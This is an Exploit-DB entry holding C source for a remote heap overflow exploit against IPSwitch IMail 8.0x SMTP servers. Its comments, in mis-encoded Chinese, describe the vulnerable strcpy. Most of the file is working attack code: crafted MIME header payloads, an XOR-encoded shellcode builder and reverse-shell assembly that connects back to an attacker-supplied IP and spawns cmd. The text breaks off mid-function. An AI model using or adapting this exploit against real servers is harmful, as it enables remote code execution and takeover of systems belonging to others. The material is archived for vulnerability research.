IPSwitch IMail Server 8.0x - Remote Heap Overflow

EDB-ID:

4438


Author:

axis

Type:

remote


Platform:

Windows

Date:

2007-09-21


/*

 by axis
 2007-06-05
 http://www.ph4nt0m.org
 Mail-List: http://list.ph4nt0m.org


 ÒÔÇ°ÓÐÕâžöÒ»žöimailµÄexp
PRIVATE Remote Exploit For IMAIL Smtp Server(1.2)
This is For imail 8.01-8.11 version
Usage:faint.exe -d <host> [options]
Options:
    -d:       Hostname to attack [Required]
    -t:       Type [Default: 0]
    -p:       Attack port [Default: 25]
    -S:       the IP connect back to.
    -P:       the port connect back to.
Types:
    0: win2k All version , IMail 8.01-11

 ²»ÖªµÀÊÇÄÄλŽóţЎµÄ

×îœü¿ŽÁË¿Ž£¬

·Ç³£ºÃÍæµÄÒ»žö©¶Ž¡£

©¶ŽÊÇ·¢ÉúÔÚiaspam.dllÀï

loc_1001ada5    ==> ×¢Ò⶯̬µ÷ÊÔʱºò×¢ÒâŒÓÔØ»ùÖ·µÄ²»Í¬¡£
mov  eax, [ebp+var_54]
mov  ecx, [eax+10c8h]
push  ecx         ; char *
mov  edx, [ebp+var_54]
mov  eax, [edx+10d0h]
push  eax         ; char *
call  _strcpy
add  esp, 8
jmp  loc_1001a6f0


 ÕâÀïstrcpyµÄÁœžöbuffer£¬srcºÍdstµÄÖžÕ룬ŸÓÈ»ÊÇÖ±œÓŽÓ¶ÑÀï¶Á³öÀŽµÄ¡£
 ¶ø֮ǰûÓÐ×öÈκΌì²é

 ËùÒÔ·¢ËÍžöÓÊŒþµœ·þÎñÆ÷£¬SMDÎÄŒþ

 È»ºóÔÚÆäºóµÄÆ«ÒÆŽŠ¿ØÖÆÕâÁœžöµØÖ·£¬ŸÍ¿ÉÒÔ¿œ±ŽÈÎÒâ×Ö·ûŽ®µœÈÎÒâÄÚŽæ¡£

 badcharÊÇ 0x00 0x0a emm˵»¹ÓОö 0x25,²»¹ýÎÒûÕÒµœ¡£


 ÒÔÇ°ÍøÉÏÄÇžö·ŽÁ¬µÄ°æ±Ÿ£¬ÊÇÀûÓÃÁËž²žÇpebÀïµÄÖžÕë¡£

 ÕâÖÖ·œ·šÔÚ2003Éϲ»ÄÜÓá£

 ÕâÀïÎÒ²ÉÓÃÁËemmµÄ·œ·š£¬¹¹ÔìÁËÒ»žöÒç³ö

 ÒòΪimailsec.dllµÄ.data¶Î¿ÉÐŽ¡£

 ËùÒÔÎÒÕÒµœÁËÕâÃŽÒ»žöµØ·œ

1000CB5D  8B45 08     MOV EAX,DWORD PTR SS:[EBP+8]
1000CB60  50       PUSH EAX
1000CB61  8B0D 6C540310  MOV ECX,DWORD PTR DS:[1003546C]     ; IMailsec.1003549C
1000CB67  51       PUSH ECX
1000CB68  8D95 FCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-204]
1000CB6E  52       PUSH EDX
1000CB6F  FF15 F8D30210  CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; USER32.wsprintfA


 ÆäÖÐÖžÕëDWORD PTR DS:[1003546C] ÔÚimailsec.dllµÄ.dataÖУ¬ÕâžöµØÖ·¿ÉÒÔ±»ÎÒÃÇž²žÇ¡£

 ËùÒÔÎÒÃÇŸÍ¿ÉÒÔ¹¹ÔìÒ»žöÒç³ö¡£

 ˌ·ÈçÏ£º
 µÚÒ»·âÓÊŒþ£º ·¢ËÍshellcodeµœÄÚŽæÖб£ŽæºÃ¡£ÕâÀïÎҷŵœÁËtebÖÐ
 µÚ¶þ·âÓÊŒþ£º ·¢ËÍÒç³öÐèÒªµÄž²žÇ×Ö·ûŽ®µœÄÚŽæÖб£ŽæºÃ¡£ÕâÀïÎÒÒ²·ÅÔÚÁËtebÖÐ
 µÚÈý·âÓÊŒþ£º ž²žÇimailsec.dllÖÐµÄ .data¶ÎµÄÖžÕ룬ʹwsprintfAÔì³ÉÒç³ö

 Òç³öž²žÇʹÓõÄ×Ö·ûŽ®Êǵڶþ·âÓÊŒþ·¢Ë͹ýÈ¥µÄ£¬ž²žÇºóµÄ·µ»ØµØÖ·Ö±œÓÖžÏòÁ˵ÚÒ»·âÓÊŒþ·¢Ë͹ýÈ¥µÄshellcodeÔÚÄÚŽæÖеĵØÖ·¡£

 ËùÒÔÕâžö©¶ŽÊǺÍƜ̚Î޹صģ¡£¡²»ÐèÒªÈκÎopcode£¡£¡

 ÔÚʵŒÊÀûÓÃʱÎÒ·¢ËÍÁË4·âÓÊŒþ£¬µÚÒ»·âÊÇ·ÏÓÊŒþ£¬ÓÃÓÚÌážß³É¹ŠÂÊ¡£


 ÓÉÓÚ»¥ÁªÍøµÄspam·ºÀÄ£¬ËùÒԵȵœÓÊŒþ·þÎñÆ÷ŽŠÀí©¶ŽÓÊŒþʱ£¬Ò²ÐíÒÑŸ­¹ýÁËŒžžöÔÂÁË¡£¡£¡£

 ËùÒÔ×îºÃµÄ·œ°žÊÇʹÓÃdownload+exec µÄshellcode¡£

 ÕâÀïžø³öÒ»žö±ÈœÏÀõķŽÁ¬shellcode×÷Ϊpoc¡£


 ŸÝemm˵Õâžö©¶ŽÒ»Ö±Ã»²¹£¬Ö»ÊǞ߰江ûÓÐÁË¡£¡£¡£

 */

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
#include <io.h>

#pragma comment (lib,"ws2_32")


char *szEHLO = "HELO\r\n";
char *szMF = "MAIL FROM <fucker@fuckimail.org>\r\n";
char *szRCPT = "RCPT TO: <postmaster>\r\n";
char *szDATA = "DATA\r\n";
char *szTIME = "Date: Thu, 1 Oct 2007 07:06:09 +0800\r\n";
char *szMIME = "MIME\r\n";
char *szEND = ".\r\n";
char *szQUIT = "QUIT\r\n";
char *szCT = "Content-Type: multipart/boundary=";
char *szCTE = "Content-Transfer-Encoding:";

//#define SCaddr "\x50\xe7\x03\x10"
#define SCaddr "\x50\xc8\xfd\x7f"
#define Fuck_ptr "\x6c\x54\x03\x10"  //0x1003546c
#define Teb_temp1 0x7ffdd050 
#define Teb_temp2 0x7ffdd040 
#define Teb_temp3 0x7ffdd030 


unsigned short port = 25;
unsigned char payload[5000] = "";#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\
          __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90
#define PROC_END PROC_BEGIN

unsigned char sh_Buff[2048];
unsigned int sh_Len;
unsigned int Enc_key=0x99;    //ÆäʵÎ޹؜ôÒª,¶¯Ì¬Ñ°ÕÒ

unsigned char decode1[] =
/*
00401004  . /EB 0E     JMP SHORT encode.00401014
00401006  $ |5B      POP EBX
00401007  . |4B      DEC EBX
00401008  . |33C9     XOR ECX,ECX
0040100A  . |B1 FF     MOV CL,0FF
0040100C  > |80340B 99   XOR BYTE PTR DS:[EBX+ECX],99
00401010  .^|E2 FA     LOOPD SHORT encode.0040100C
00401012  . |EB 05     JMP SHORT encode.00401019
00401014  > \E8 EDFFFFFF  CALL encode.00401006
*/
"\xEB\x0E\x5B\x4B\x33\xC9\xB1"
"\xFF"     // shellcode size
"\x80\x34\x0B"
"\xB8"     // xor byte
"\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF";

unsigned char decode2[] =
/*
00406030  /EB 10      JMP SHORT 00406042
00406032  |5B       POP EBX
00406033  |4B       DEC EBX
00406034  |33C9      XOR ECX,ECX
00406036  |66:B9 6601   MOV CX,166
0040603A  |80340B 99    XOR BYTE PTR DS:[EBX+ECX],99
0040603E ^|E2 FA      LOOPD SHORT 0040603A
00406040  |EB 05      JMP SHORT 00406047
00406042  \E8 EBFFFFFF   CALL 00406032
*/
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9"
"\x66\x01"   // shellcode size
"\x80\x34\x0B"
"\xB8"     // xor byte
"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF";

// kernel32.dll functions index
#define _LoadLibraryA			0x00
#define _CreateProcessA			0x04
//#define _ExitProcess			0x08
#define _ExitThread 			0x08
#define	_WaitForSingleObject	0x0C
// ws2_32.dll functions index
#define _WSASocketA				0x10
#define _connect				0x14
#define _closesocket			0x18
//#define _WSAStartup			0x1C

// functions number
#define _Knums         4
#define _Wnums         3

// Need functions
unsigned char functions[100][128] =     
{                      // [esi] stack layout
  // kernel32 4              // 00 kernel32.dll
  {"LoadLibraryA"},            //  [esi]
  {"CreateProcessA"},           //  [esi+4]    
  {"ExitThread"},             //  [esi+8]
  //{"ExitProcess"},
  //{"TerminateProcess"},
  {"WaitForSingleObject"},        //  [esi+12] 

  // ws2_32 3              // 01 ws2_32.dll
  {"WSASocketA"},             //  [esi+16]   
  {"connect"},              //  [esi+20]		
  {"closesocket"},            //  [esi+24]
  //{"WSAStartup"},            //  [esi+28]
  {""},
};

void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();

// Get function hash
unsigned long hash(unsigned char *c)
{
  unsigned long h=0;
  while(*c)
  {
    h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++;
  }
  return h;
}

// get shellcode
void GetShellCode(char* ipstr, short port)
{
  char *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  char *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  unsigned char *pSc_addr;
  unsigned char pSc_Buff[2048];
  unsigned int  MAX_Sc_Len=0x2000;
  unsigned long dwHash[100];
  unsigned int  dwHashSize;

  unsigned int l,i,j,k;

	char *p;
	int ip;

  // Get functions hash
  for (i=0;;i++) {
    if (functions[i][0] == '\x0') break;

    dwHash[i] = hash(functions[i]);
    //fprintf(stderr, "%.8X\t%s\n", dwHash[i], functions[i]);
  }
  dwHashSize = i*4;

  // Deal with shellcode
  pSc_addr = (unsigned char *)ShellCode;

  for (k=0;k<MAX_Sc_Len;++k ) {
    if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) {
      break;
    }
  }
  pSc_addr+=(k+8);  // start of the ShellCode
  
  for (k=0;k<MAX_Sc_Len;++k) {
    if(memcmp(pSc_addr+k,fnend_str, 8)==0) {
      break;
    }
  }
  sh_Len=k; // length of the ShellCode
  
  memcpy(pSc_Buff, pSc_addr, sh_Len);

	for(k=0; k<sh_Len; ++k)
	{
		if(memcmp(pSc_Buff+k, "\x68\x7F\x00\x00\x01", 5) == 0)
		{
			ip = inet_addr(ipstr);
			p = (char*)&ip;
			pSc_Buff[k+1] = p[0];
			pSc_Buff[k+2] = p[1];
			pSc_Buff[k+3] = p[2];
			pSc_Buff[k+4] = p[3];
		}
		if(memcmp(pSc_Buff+k, "\x68\x02\x00\x00\x35", 5) == 0)
		{
			p = (char*)&port;
			pSc_Buff[k+3] = p[1]; 
			pSc_Buff[k+4] = p[0];
		}
	}

  // Add functions hash
  memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize);
  sh_Len += dwHashSize;

  //printf("%d bytes shellcode\n", sh_Len);
  // print shellcode
  //PrintSc(pSc_Buff, sh_Len);

  // find xor byte
  for(i=0xff; i>0; i--)
  {
    l = 0;
    for(j=0; j<sh_Len; j++)
    {
      if ( 
//          ((pSc_Buff[j] ^ i) == 0x26) ||  //%
//          ((pSc_Buff[j] ^ i) == 0x3d) ||  //=
  //        ((pSc_Buff[j] ^ i) == 0x3f) ||  //?
          //((pSc_Buff[j] ^ i) == 0x40) ||  //@
          ((pSc_Buff[j] ^ i) == 0x00) ||
				  //((pSc_Buff[j] ^ i) == 0x3c) ||
				  //((pSc_Buff[j] ^ i) == 0x3e) ||
	//			  ((pSc_Buff[j] ^ i) == 0x2f) ||
	//			  ((pSc_Buff[j] ^ i) == 0x22) ||
	//			  ((pSc_Buff[j] ^ i) == 0x2a) ||
				  //((pSc_Buff[j] ^ i) == 0x3a) ||
	//			  ((pSc_Buff[j] ^ i) == 0x20) ||
	        ((pSc_Buff[j] ^ i) == 0x25) ||
          ((pSc_Buff[j] ^ i) == 0x0D) ||
          ((pSc_Buff[j] ^ i) == 0x0A) 
  //        ((pSc_Buff[j] ^ i) == 0x5C)
        )
      {
        l++;
        break;
      };
    }

    if (l==0)
    {
      Enc_key = i;
      //printf("Find XOR Byte: 0x%02X\n", i);
      for(j=0; j<sh_Len; j++)
      {
        pSc_Buff[j] ^= Enc_key;
      }

      break;            // break when found xor byte
    }
  }

  // No xor byte found
  if (l!=0){
    //fprintf(stderr, "No xor byte found!\n");

    sh_Len = 0;
  }
  else {
    //fprintf(stderr, "Xor byte 0x%02X\n", Enc_key);

    // encode
    if (sh_Len > 0xFF) {
      *(unsigned short *)&decode2[8] = sh_Len;
      *(unsigned char *)&decode2[13] = Enc_key;

      memcpy(sh_Buff, decode2, sizeof(decode2)-1);
      memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len);
      sh_Len += sizeof(decode2)-1;
    }
    else {
      *(unsigned char *)&decode1[7] = sh_Len;
      *(unsigned char *)&decode1[11] = Enc_key;

      memcpy(sh_Buff, decode1, sizeof(decode1)-1);
      memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len);
      sh_Len += sizeof(decode1)-1;
    }
  }
}

// print shellcode
void PrintSc(unsigned char *lpBuff, int buffsize)
{
  int i,j;
  char *p;
  char msg[4];

  printf("/* %d bytes */\n",buffsize);
  for(i=0;i<buffsize;i++)
  {
    if((i%16)==0)
      if(i!=0)
        printf("\"\n\"");
      else
        printf("\"");
    sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);
    for( p = msg, j=0; j < 4; p++, j++ )
    {
      if(isupper(*p))
        printf("%c", _tolower(*p));
      else
        printf("%c", p[0]);
    }
  }
  printf( "\";\n");
}

// ShellCode function
void ShellCode()
{
  __asm
  {
    PROC_BEGIN             // C macro to begin proc

    jmp   sc_end    
sc_start:     
    pop   edi             // Hash string start addr (esp -> edi)

    // Get kernel32.dll base addr
    mov   eax, fs:0x30        // PEB
    mov   eax, [eax+0x0c]       // PROCESS_MODULE_INFO
    mov   esi, [eax+0x1c]       // InInitOrder.flink 
    lodsd                // eax = InInitOrder.blink
    mov   ebp, [eax+8]        // ebp = kernel32.dll base address

    mov   esi, edi          // Hash string start addr -> esi
  
  // Get function addr of kernel32
    push  _Knums
    pop   ecx
    
	get_kernel32:
    call  GetProcAddress_fun
    loop  get_kernel32

    // Get ws2_32.dll base addr
    push  0x00003233
    push  0x5f327377
    push  esp
    call  dword ptr [esi+_LoadLibraryA]     // LoadLibraryA("ws2_32");
    
    //mov   ebp, eax          // ebp = ws2_32.dll base address
    xchg  eax, ebp

  // Get function addr of ws2_32
    push  _Wnums
    pop   ecx

  get_ws2_32:
    call  GetProcAddress_fun
    loop  get_ws2_32


//
/*   
//LWSAStartup:
    sub   esp, 400
    push  esp
    push  0x101
    call  dword ptr [esi+_WSAStartup]       // WSAStartup(0x101, &WSADATA);
//
*/

//LWSASocketA:
    push  ecx
    push  ecx
    push  ecx
    push  ecx

    push  1
    push  2
    call  dword ptr [esi+_WSASocketA]  // s=WSASocketA(2,1,0,0,0,0);

    //mov   ebx, eax          // socket -> ebx
    xchg  eax, ebx
		
//Lconnect:
		//int 3
    push  0x0100007F 					// host: 127.0.0.1 
    push  0x35000002 					// port: 53 
    mov   ebp, esp
    
    push  0x10            // sizeof(sockaddr_in)
    push  ebp             // sockaddr_in address
    push  ebx             // socket s
    call  dword ptr [esi+_connect]  // connect(s, name, sizeof(name));

    // if connect failed , exit
    test  eax, eax
    jne   Finished
		
//    xor   eax, eax
    
    // allot memory for STARTUPINFO, PROCESS_INFORMATION
    mov   edi, esp
      
    // zero out SI/PI
    push  0x12
    pop   ecx
  stack_zero:
    stosd
    loop  stack_zero
    
    //mov   byte ptr [esp+0x10], 0x44  // si.cb = sizeof(si)
    //inc   byte ptr [esp+0x3C]     // si.dwFlags
    //inc   byte ptr [esp+0x3D]     // si.wShowWindow
    //mov   [esp+0x48], ebx       // si.hStdInput = s
    //mov   [esp+0x4C], ebx       // si.hStdOutput = s
    //mov   [esp+0x50], ebx       // si.hStdError = s
    
    mov   word ptr [esp+0x3c], 0x0101
    xchg  eax, ebx
    stosd
    stosd
    stosd
  
    mov   edi, esp
  
    // push "cmd"
    push  0x00646d63         // "cmd"
    mov   ebp, esp

    push  eax             // socket
		
//LCreateProcess:
    lea   eax, [edi+0x10]          
    push  edi             // pi
    push  eax             // si
    push  ecx             // lpCurrentDirectory
    push  ecx             // lpEnvironment
    push  ecx             // dwCreationFlags
    push  1              // bInheritHandles
    push  ecx             // lpThreadAttributes
    push  ecx             // lpProcessAttributes
    push  ebp             // lpCommandLine = "cmd"
    push  ecx             // lpApplicationName NULL
    call  dword ptr [esi+_CreateProcessA]     // CreactProcessA(NULL,"CMD",0,0,1,0,0,0,si, pi);
  
//LWaitForSingleObject:
    //push  1 
    push  0xFFFFFFFF
    push  dword ptr [edi]
    call  dword ptr [esi+_WaitForSingleObject]  // WaitForSingleObject(Handle, time) ;

//LCloseSocket:
    //push  ebx
    call  dword ptr [esi+_closesocket]      // closesocket(c);

Finished:
		// »ÖžŽ¹¹ÔìµÄÒç³öµã
		mov   eax, 0x1003546c
		mov   DWORD ptr [eax],  0x1003549c
		mov   DWORD ptr [eax+4], 0x100354c8
		mov   DWORD ptr [eax+8], 0x100354e0    //push  1
    //call  dword ptr [esi+_ExitProcess]      // ExitProcess();
		xor   eax, eax
		push  eax
		call  dword ptr [esi+_ExitThread]

// 
GetProcAddress_fun:  
    push  ecx
    push  esi
  
    mov   esi, [ebp+0x3C]       // e_lfanew
    mov   esi, [esi+ebp+0x78]     // ExportDirectory RVA
    add   esi, ebp          // rva2va
    push  esi
    mov   esi, [esi+0x20]       // AddressOfNames RVA
    add   esi, ebp          // rva2va
    xor   ecx, ecx
    dec   ecx

  find_start:
    inc   ecx
    lodsd
    add   eax, ebp
    xor   ebx, ebx
    
  hash_loop:
    movsx  edx, byte ptr [eax]
    cmp   dl, dh
    jz   short find_addr
    ror   ebx, 7        // hash key
    add   ebx, edx
    inc   eax
    jmp   short hash_loop
   
  find_addr:
    cmp   ebx, [edi]         // compare to hash
    jnz   short find_start
    pop   esi             // ExportDirectory
          // AddressOfNameOrdinals RVA
/*
//--------------------------------------------------------
		jmp over_it
		__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 
		__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40
		__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 
		__asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 __asm _emit 0x40 
//--------------------------------------------------------

over_it:
*/
		mov   ebx, [esi+0x24] 
    add   ebx, ebp          // rva2va
    mov   cx, [ebx+ecx*2]       // FunctionOrdinal
    mov   ebx, [esi+0x1C]       // AddressOfFunctions RVA
    add   ebx, ebp          // rva2va
    mov   eax, [ebx+ecx*4]      // FunctionAddress RVA
    add   eax, ebp          // rva2va
    stosd                // function address save to [edi]
    
    pop   esi
    pop   ecx
    ret
    
sc_end:
    call sc_start
    
    PROC_END              //C macro to end proc
  }
}

// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
  struct sockaddr_in target;
  SOCKET s;
  int i;
  DWORD bf;
  fd_set wd;
  struct timeval tv;

  s = socket(AF_INET,SOCK_STREAM,0);
  if(s<0)
    return -1;

  target.sin_family = AF_INET;
  target.sin_addr.s_addr = inet_addr(address);
  if(target.sin_addr.s_addr==0)
  {
    closesocket(s);
    return -2;
  }
  target.sin_port = htons((short)port);
  bf = 1;
  ioctlsocket(s,FIONBIO,&bf);
  tv.tv_sec = timeout;
  tv.tv_usec = 0;
  FD_ZERO(&wd);
  FD_SET(s,&wd);
  connect(s,(struct sockaddr *)&target,sizeof(target));
  if((i=select(s+1,0,&wd,0,&tv))==(-1))
  {
    closesocket(s);
    return -3;
  }
  if(i==0)
  {
    closesocket(s);
    return -4;
  }
  i = sizeof(int);
  getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
  if((bf!=0)||(i!=sizeof(int)))
  {
    closesocket(s);
    return -5;
  }
  ioctlsocket(s,FIONBIO,&bf);
  return s;
}
void Disconnect(SOCKET s)
{
	closesocket(s);
	WSACleanup();
}void help(char *n)
{
	printf("==Usage:\n");
	printf("%s [target ip] [target port] [local ip] [local port]\n\n", n);
	printf("We will send 4 mail to trigger the vuln.\n");
	printf("The fucking vuln will be triggered when the mail server handling the mail.\n");
	printf("Because of the Spam in the internet,\nthe vuln maybe triggered after a few days!!Fuck!!\n\n");

}


int sendfuckingmail(int the_mail, char *target, int tg_port)
{
	SOCKET s;
	WSADATA WSAData;
	char buffer[1000] = {0};  // ÁÙʱbufferÓÃÓÚio
	int ret;

	char padding[5000] = {0};  // paddingÓÃÓÚÌî³ä

	if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
	{
		fprintf(stderr, "[-] WSAStartup failed.\n");
		WSACleanup();
		exit(1);
	}


	s = Make_Connection(target, tg_port, 10);
	if(s<0)
	{
		fprintf(stderr, "[-] connect err.\n");
		exit(1);
	}
  

	recv(s, buffer, sizeof(buffer), 0);
	Sleep(1000);
 
  ret = strlen(buffer);	

	if ( ret < 10 )
	{		
		printf("[-]Seems Service Down~ :( \n");
		Disconnect(s);
		return -1;		
	}


	printf("[+]Got Banner: %s", buffer);	// HELO
	send(s, szEHLO, strlen(szEHLO), 0);
	recv(s, buffer, sizeof(buffer), 0);
//	printf("%s", buffer);
  printf("[+]Say hello to Server.\n");
	memset(buffer, 0, sizeof(buffer));

	// MAIL FROM
	Sleep(500);
	send(s, szMF, strlen(szMF), 0);
	recv(s, buffer, sizeof(buffer), 0);
	if(strstr(buffer, "250"))
	 printf("[+]Recv: %s", buffer);
	else
		{
			printf("[-]Seems Service Down~ :( \n");
			Disconnect(s);
			return -1;
		}
	memset(buffer, 0, sizeof(buffer));


	// RCPT TO
	Sleep(500);
	send(s, szRCPT, strlen(szRCPT), 0);
	recv(s, buffer, sizeof(buffer), 0);
	if(strstr(buffer, "250"))
	 printf("[+]Recv: %s", buffer);
	else
		{
			printf("[-]Seems Service Down~ :( \n");
			Disconnect(s);
			return -1;
		}
	memset(buffer, 0, sizeof(buffer));


	// DATA
	Sleep(500);
	send(s, szDATA, strlen(szDATA), 0);
	recv(s, buffer, sizeof(buffer), 0);
	if(strstr(buffer, "354"))
	 printf("[+]Recv: %s", buffer);
	else
		{
			printf("[-]Seems Service Down~ :( \n");
			Disconnect(s);
			return -1;
		}
	memset(buffer, 0, sizeof(buffer));


	Sleep(100);
	// TIME
	send(s, szTIME, strlen(szTIME), 0);
//	recv(s, buffer, sizeof(buffer), 0);
//	printf("%s", buffer);
  printf("[+]Fucking Server at %s", szTIME);
	memset(buffer, 0, sizeof(buffer));

	

	Sleep(200);


	// ÅжÏÊǵڌž·âÓÊŒþ
	if (the_mail == 0)  // ·¢Ò»·â·ÏÓÊŒþ£¬Ìážß³É¹ŠÂÊ
	{
    /*
      my $padding = "\x22"."B"x2028;
      my $padding1 = "B"x2046;
      my $padding11 = "B"x146;  #163žöB
      my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f";   # ÔÚtebÖÐ
      my $straddr2 = "\x50\xc0\xfd\x7f";   # shellcode»á¿œ±ŽµœµÄµØÖ·

      print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
    */
		memcpy(payload, szCT, strlen((const char *)szCT));
		//memcpy(payload+strlen(const char *szCT), "\"", 1);
		memset(padding, 0x43, 5000);
		padding[0] = '\x22';  
		padding[2029] = '\x20';
		padding[4076] = '\x20';

		//straddr1
		padding[4223] = '\x50';
		padding[4224] = '\xd0';
		padding[4225] = '\xfd';
		padding[4226] = '\x7f';
		padding[4227] = '\x30';
		padding[4228] = '\xd0';
		padding[4229] = '\xfd';
		padding[4230] = '\x7f';

		//straddr2  0x10036ea0
		padding[4231] = '\x30';
		padding[4232] = '\xd8';
		padding[4233] = '\xfd';
		padding[4234] = '\x7f';

		padding[4235] = '\x0d';
		padding[4236] = '\x0a';
		padding[4237] = '\x00';

		
		memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
		send(s, (const char *)payload, strlen((const char *)payload), 0);

		Sleep(100);
		// MIME
   	send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
  //	recv(s, buffer, sizeof(buffer), 0);
 //	printf("%s", buffer);
  //   printf("[+]Fucking Server at %s.\n", szTIME);
  // 	memset(buffer, 0, sizeof(buffer));
		
		//print $sock "Content-Transfer-Encoding:$padding2\r\n";
		memset(padding, 0x43, 80);
		//memcpy(padding, "\x43", 80);
		padding[80] = '\x00';

		memset(payload, 0x00, sizeof(payload));
		memcpy(payload, szCTE, strlen((const char*)szCTE));
    memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
    memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);

		Sleep(200);
		send(s, (const char *)payload, strlen((const char *)payload), 0);

		memset(payload, 0x00, sizeof(payload));

	} 
	else if (the_mail == 1)  // ¹¹ÔìbufferoverflowµÄž²žÇ×Ö·ûŽ®
	{
		/*
      my $padding = "\x22"."B"x2028;
      my $padding1 = "B"x2046;
      my $padding11 = "B"x146;  #163žöB
      my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f";   # ÔÚtebÖÐ
      my $straddr2 = "\x50\xc0\xfd\x7f";   # shellcode»á¿œ±ŽµœµÄµØÖ·

      print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
    */
		memcpy(payload, szCT, strlen((const char *)szCT));
		//memcpy(payload+strlen(const char *szCT), "\"", 1);
		memset(padding, 0x43, 5000);
		padding[0] = '\x22';  
		padding[2029] = '\x20';
		padding[4076] = '\x20';

		//straddr1
		padding[4223] = '\x50';
		padding[4224] = '\xd0';
		padding[4225] = '\xfd';
		padding[4226] = '\x7f';
		padding[4227] = '\x30';
		padding[4228] = '\xd0';
		padding[4229] = '\xfd';
		padding[4230] = '\x7f';

		//straddr2  0x10036ea0
		padding[4231] = '\x50';
		padding[4232] = '\xc0';
		padding[4233] = '\xfd';
		padding[4234] = '\x7f';

		padding[4235] = '\x0d';
		padding[4236] = '\x0a';
		padding[4237] = '\x00';

		
		memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
		send(s, (const char *)payload, strlen((const char *)payload), 0);

		Sleep(100);
		// MIME
   	send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
  //	recv(s, buffer, sizeof(buffer), 0);
 //	printf("%s", buffer);
  //   printf("[+]Fucking Server at %s.\n", szTIME);
  // 	memset(buffer, 0, sizeof(buffer));
		
		//print $sock "Content-Transfer-Encoding:$padding2\r\n";
		memset(padding, 0x43, 80);
		//memcpy(padding, "\x43", 80);
		padding[80] = '\x00';

		memset(payload, 0x00, sizeof(payload));
		memcpy(payload, szCTE, strlen((const char*)szCTE));
    memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
    memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);

		Sleep(200);
		send(s, (const char *)payload, strlen((const char *)payload), 0);


		// send payload ¹¹ÔìÒç³öµÄ×Ö·ûŽ® eipÖžÏòshellcodeµÄµØÖ·
    memset(payload, 0x00, sizeof(payload));
		memset(payload, 0x44, 520);
		memcpy(payload+520, SCaddr, strlen((const char *)SCaddr));
		memcpy(payload+520+4, "\r\n", 2);

		Sleep(200);
		send(s, (const char *)payload, strlen((const char *)payload), 0);

		memset(payload, 0x00, sizeof(payload));
		
	}
	else if (the_mail == 2)   // ·¢ËÍshellcode
	{
		/*
      my $padding = "\x22"."B"x2028;
      my $padding1 = "B"x2046;
      my $padding11 = "B"x146;  #163žöB
      my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f";   # ÔÚtebÖÐ
      my $straddr2 = "\x50\xe7\x03\x10";   # shellcode»á¿œ±ŽµœµÄµØÖ·

      print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
    */
		memcpy(payload, szCT, strlen((const char *)szCT));
		//memcpy(payload+strlen(const char *szCT), "\"", 1);
		memset(padding, 0x43, 5000);
		padding[0] = '\x22';  
		padding[2029] = '\x20';
		padding[4076] = '\x20';

		//straddr1
		padding[4223] = '\x50';
		padding[4224] = '\xd0';
		padding[4225] = '\xfd';
		padding[4226] = '\x7f';
		padding[4227] = '\x30';
		padding[4228] = '\xd0';
		padding[4229] = '\xfd';
		padding[4230] = '\x7f';

		//straddr2  0x7ffdc850
		padding[4231] = '\x50';
		padding[4232] = '\xc8';
		padding[4233] = '\xfd';
		padding[4234] = '\x7f';

		padding[4235] = '\x0d';
		padding[4236] = '\x0a';
		padding[4237] = '\x00';

		
		memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
		send(s, (const char *)payload, strlen((const char *)payload), 0);

		// MIME
   	send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
  //	recv(s, buffer, sizeof(buffer), 0);
 //	printf("%s", buffer);
  //   printf("[+]Fucking Server at %s.\n", szTIME);
  // 	memset(buffer, 0, sizeof(buffer));
		
		//print $sock "Content-Transfer-Encoding:$padding2\r\n";
		memset(padding, 0x43, 80);
		//memcpy(padding, "\x43", 80);
		padding[80] = '\x00';

		memset(payload, 0x00, sizeof(payload));
		memcpy(payload, szCTE, strlen((const char*)szCTE));
    memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
    memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);

		send(s, (const char *)payload, strlen((const char *)payload), 0);
		Sleep(200);

		// ·¢ËÍshellcode¹ýÈ¥±£Žæ
